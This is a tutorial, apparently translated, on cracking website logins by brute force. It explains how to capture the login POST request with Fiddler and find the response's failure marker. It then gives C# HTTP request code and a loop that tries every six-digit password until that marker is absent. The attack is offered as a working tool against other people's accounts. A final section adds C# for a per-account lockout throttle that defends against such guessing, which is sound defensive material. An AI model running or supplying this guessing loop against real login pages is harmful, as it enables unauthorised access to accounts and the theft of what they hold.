The techniques used are again network packet capture, DOM tree analysis, network requests and so on.
- Network packet capture
- DOM Tree Analysis
- Network requests
- Cracking loop
Network packet capture
Capturing the traffic is simple. First open Fiddler, then open the website you want to crack, enter the user name and a fake password (if you know the real password, there is no need to crack it) and click Login. Fiddler will now show a login request, generally a POST request. The request content clearly shows the requested URL, user name, password and so on. Copy it and keep it for the next step.
DOM Tree Analysis
The DOM tree analysis here only needs to look at the response to that login request. It generally tells you that the login failed. Some sites return an entire HTML page, some return JSON and so on, but in every case you will find some marker showing that the login failed. Record it as well, ready for the next step.
Network requests
The network request code was introduced in the previous article; I post it again here. What needs emphasis is the encoding in using (StreamReader sr = new StreamReader(instream, encoding)): if you can see the encoding of the returned page, set the corresponding encoding here, otherwise the text will come out garbled. If you do not know it, try GB2312 and so on one by one until the output is no longer garbled.
// Requires: using System; using System.IO; using System.Net; using System.Text;
// cookie (CookieContainer) and encoding (Encoding) are fields of the containing class.
public string getcontent(string method, string url, string postdata = null)
{
    HttpWebResponse response = null;
    HttpWebRequest request = null;
    if (cookie == null)
        cookie = new CookieContainer();
    // Prepare request ...
    try
    {
        // Set parameters
        request = WebRequest.Create(url) as HttpWebRequest;
        request.CookieContainer = cookie;
        request.AllowAutoRedirect = true;
        request.Method = method.ToUpper();
        request.ContentType = "application/x-www-form-urlencoded";
        string useragent = String.Format("Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.8670)");
        request.UserAgent = useragent;
        if (method.ToUpper() == "POST")
        {
            if (!string.IsNullOrEmpty(postdata))
            {
                byte[] data = Encoding.Default.GetBytes(postdata);
                // ContentLength is set only when there is a body to send
                request.ContentLength = data.Length;
                using (Stream outstream = request.GetRequestStream())
                {
                    outstream.Write(data, 0, data.Length);
                }
            }
        }
        // Send the request and get the response data.
        // The POST request is not actually sent to the target page until request.GetResponse() is called.
        response = request.GetResponse() as HttpWebResponse;
        using (Stream instream = response.GetResponseStream())
        {
            using (StreamReader sr = new StreamReader(instream, encoding))
            {
                // Return the result page (HTML) code
                string content = sr.ReadToEnd();
                return content;
            }
        }
    }
    catch (Exception ex)
    {
        string err = ex.Message;
        return err;
    }
    finally
    {
        if (response != null)
            response.Close();
    }
}
Cracking loop
This is the core of the article. Knowing the login request and the login-failure marker, the next step is to try passwords one by one, just as we did when cracking the password box, except that here the program does it automatically. First write a loop from 0 to 999999 (assuming a 6-digit password), then assemble the data for the login request (including the user name and password), send the network request and check the result. If it contains the failure marker found earlier, continue the loop; if it does not, congratulations, your password is found. The code is as follows:
int start = 0;
int end = 999999;
for (int i = start; i <= end; i++)
{
    var pass = i.ToString().PadLeft(6, '0'); // fewer than 6 digits: left-pad with 0
    var post = "usename=yourname" + "&password=" + pass; // assemble the request data
    var res = getcontent("POST", loginurl, post);
    if (!res.Contains("Fail ID"))
    {
        MessageBox.Show("Password is:" + pass);
        return;
    }
}
i.ToString().PadLeft(6, '0')
pads values shorter than 6 digits with leading zeros, so that the password is always 6 digits long.
var post = "usename=yourname" + "&password=" + pass
assembles the data to be sent.
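Seen from the server side, the loop above only succeeds if the login endpoint answers an unlimited number of guesses for one account. The following is an added example, not code from the original article, of a per-account throttle with a doubling lockout; the class name LoginThrottle, its thresholds and the simulated clock are assumptions made for illustration.

```csharp
using System;
using System.Collections.Generic;
// Added example: per-account failed-login throttle (names and thresholds are assumptions).
public class LoginThrottle
{
    private class State { public int Failures; public DateTime LockedUntil; }
    private readonly Dictionary<string, State> accounts = new Dictionary<string, State>();
    private readonly object gate = new object();
    private const int FreeAttempts = 5;                       // failures tolerated before locking
    private const double BaseLockSeconds = 30, MaxLockSeconds = 3600;

    // Call before checking the password. False means: reject without evaluating it,
    // so a locked account answers right and wrong guesses identically.
    public bool IsAllowed(string user, DateTime now)
    {
        State s;
        lock (gate) return !accounts.TryGetValue(user, out s) || now >= s.LockedUntil;
    }

    // Call after the password check to record its outcome.
    public void Record(string user, bool success, DateTime now)
    {
        lock (gate)
        {
            if (success) { accounts.Remove(user); return; }
            State s;
            if (!accounts.TryGetValue(user, out s)) accounts[user] = s = new State();
            s.Failures++;
            if (s.Failures < FreeAttempts) return;
            // The lock doubles with each further failure (30 s, 60 s, 120 s ...), capped at one hour.
            int doublings = Math.Min(s.Failures - FreeAttempts, 20);
            s.LockedUntil = now.AddSeconds(Math.Min(BaseLockSeconds * Math.Pow(2, doublings), MaxLockSeconds));
        }
    }
}
public static class Demo
{
    public static void Main()
    {
        var throttle = new LoginThrottle();
        var now = new DateTime(2024, 1, 1, 0, 0, 0, DateTimeKind.Utc);   // constructed, fixed clock
        int evaluated = 0;
        // Simulates the 000000..999999 loop against one account without any waiting.
        while (evaluated < 1000000 && throttle.IsAllowed("yourname", now))
        {
            throttle.Record("yourname", false, now);   // every guess is wrong in this simulation
            evaluated++;
        }
        Console.WriteLine("Guesses evaluated before lockout: " + evaluated);
    }
}
```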
Web crawler (password cracking)